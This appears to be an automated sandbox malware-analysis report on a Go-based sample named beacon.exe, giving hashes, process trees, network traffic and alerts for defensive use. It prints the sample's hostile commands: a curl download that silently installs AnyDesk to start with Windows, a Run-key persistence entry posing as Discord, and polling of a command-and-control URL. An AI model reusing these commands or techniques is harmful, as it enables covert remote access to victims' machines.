File name: | beacon.exe |
Full analysis: | https://app.any.run/tasks/4bbd8315-2641-429f-8aa2-05025c77c48c |
Verdict: | Malicious activity |
Analysis date: | April 15, 2025, 17:14:52 |
OS: | Windows 10 Professional (build: 19044, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.microsoft.portable-executable |
File info: | PE32+ executable (console) x86-64, for MS Windows, 15 sections |
MD5: | B6DA6E98198299498ABE1B10EAEC5F74 |
SHA1: | B757D7C52B39633D40519F6092ECBDF5C37C1150 |
SHA256: | F108A0526F6C52EF8C11806839846E85D5BA2984578E2403CD8F7EAECF828018 |
SSDEEP: | 98304:KN3od5CrxF/mytwEqNaOhEO1TP6qQNrZSCcrBG9kvQnSTX22FaAdUN0bkc9CMtsh:hl/T1W |
.exe | | | Win64 Executable (generic) (87.3) |
---|---|---|
.exe | | | Generic Win/DOS Executable (6.3) |
.exe | | | DOS Executable Generic (6.3) |
MachineType: | AMD AMD64 |
---|---|
TimeStamp: | 0000:00:00 00:00:00 |
ImageFileCharacteristics: | Executable, Large address aware |
PEType: | PE32+ |
LinkerVersion: | 3 |
CodeSize: | 2659840 |
InitializedDataSize: | 257024 |
UninitializedDataSize: | - |
EntryPoint: | 0x74500 |
OSVersion: | 6.1 |
ImageVersion: | 1 |
SubsystemVersion: | 6.1 |
Subsystem: | Windows command line |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1040 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Activation Client Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
1188 | cmd /C "echo2 " | C:\Windows\System32\cmd.exe | — | beacon.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
3240 | cmd /C "curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe && AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win" | C:\Windows\System32\cmd.exe | — | beacon.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 11341829 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
5008 | curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe | C:\Windows\System32\curl.exe | cmd.exe | ||||||||||||
User: admin Company: curl, https://curl.se/ Integrity Level: MEDIUM Description: The curl executable Exit code: 0 Version: 8.4.0 Modules
| |||||||||||||||
5776 | cmd /C "cmd.exe /c curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe && AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win" | C:\Windows\System32\cmd.exe | — | beacon.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 11341829 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6676 | AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win | C:\Users\admin\AppData\Local\Temp\AnyDesk.exe | — | cmd.exe | |||||||||||
User: admin Company: AnyDesk Software GmbH Integrity Level: MEDIUM Description: AnyDesk Exit code: 11341829 Version: 9.5.1 Modules
| |||||||||||||||
6944 | AnyDesk.exe --install \"C:\Program Files\AnyDesk\" --silent --start-with-win | C:\Users\admin\AppData\Local\Temp\AnyDesk.exe | — | cmd.exe | |||||||||||
User: admin Company: AnyDesk Software GmbH Integrity Level: MEDIUM Description: AnyDesk Exit code: 11341829 Version: 9.5.1 Modules
| |||||||||||||||
7276 | cmd.exe /c curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
7292 | curl -o AnyDesk.exe https://download.anydesk.com/AnyDesk.exe | C:\Windows\System32\curl.exe | cmd.exe | ||||||||||||
User: admin Company: curl, https://curl.se/ Integrity Level: MEDIUM Description: The curl executable Exit code: 0 Version: 8.4.0 Modules
| |||||||||||||||
7324 | "C:\Users\admin\AppData\Local\Temp\beacon.exe" | C:\Users\admin\AppData\Local\Temp\beacon.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Modules
|
(PID) Process: | (7324) beacon.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
Operation: | write | Name: | Discord |
Value: C:\Users\admin\AppData\Local\Temp\beacon.exe |
PID | Process | Filename | Type | |
---|---|---|---|---|
6676 | AnyDesk.exe | C:\Users\admin\AppData\Roaming\AnyDesk\system.conf~RF119131.TMP | — | |
MD5:— | SHA256:— | |||
7292 | curl.exe | C:\Users\admin\AppData\Local\Temp\AnyDesk.exe | executable | |
MD5:77DD4393183A61D9D5FDAD9FFA79A2F7 | SHA256:6CCEA6A959128112613D7A82C067F8CCC78F05F1F8F47348FC9FECF269F0F21A | |||
6676 | AnyDesk.exe | C:\Users\admin\AppData\Roaming\AnyDesk\ad.trace | text | |
MD5:0EC6BFA55384B0581AC7E6EC3E52B2CF | SHA256:08B40B69D0C70190E5237E382B05D2B40A5488FF62A4915CDA33E8CF2545300E | |||
6676 | AnyDesk.exe | C:\Users\admin\AppData\Roaming\AnyDesk\system.conf.new | text | |
MD5:9C920C4985A86DEF63FB4039E458F5ED | SHA256:346A8D8B8D5946D55653DFB405293A787B8D757D7C83514946A0769282261AF0 | |||
6676 | AnyDesk.exe | C:\Users\admin\AppData\Roaming\AnyDesk\system.conf | text | |
MD5:9C920C4985A86DEF63FB4039E458F5ED | SHA256:346A8D8B8D5946D55653DFB405293A787B8D757D7C83514946A0769282261AF0 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
5496 | MoUsoCoreWorker.exe | GET | 200 | 95.101.54.122:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown | — | — | — |
7324 | beacon.exe | POST | 201 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/connect | unknown | — | — | — |
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown | — | — | — |
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown | — | — | — |
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown | — | — | — |
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown | — | — | — |
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown | — | — | — |
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7324 | beacon.exe | GET | 200 | 193.124.117.89:80 | http://193.124.117.89/120t9iITNhRIKaVyv54R1DQXRQJiTjHG/command | unknown | — | — | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
6544 | svchost.exe | 40.126.32.134:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
2104 | svchost.exe | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
— | — | 20.73.194.208:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
5496 | MoUsoCoreWorker.exe | 95.101.54.122:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
7324 | beacon.exe | 193.124.117.89:80 | — | JSC Mediasoft ekspert | RU | unknown |
3216 | svchost.exe | 172.211.123.248:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | FR | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
6544 | svchost.exe | 40.126.32.68:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | NL | unknown |
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted |
Domain | IP | Reputation |
---|---|---|
google.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
settings-win.data.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
download.anydesk.com |
| whitelisted |
c.pki.goog |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | Misc activity | ET INFO Go-http-client User-Agent Observed Outbound |
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | Misc activity | ET INFO Go-http-client User-Agent Observed Outbound |
— | — | Misc activity | SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body |
— | — | Misc activity | ET INFO Go-http-client User-Agent Observed Outbound |
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | Misc activity | ET INFO Go-http-client User-Agent Observed Outbound |
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |
— | — | Misc activity | ET USER_AGENTS Go HTTP Client User-Agent |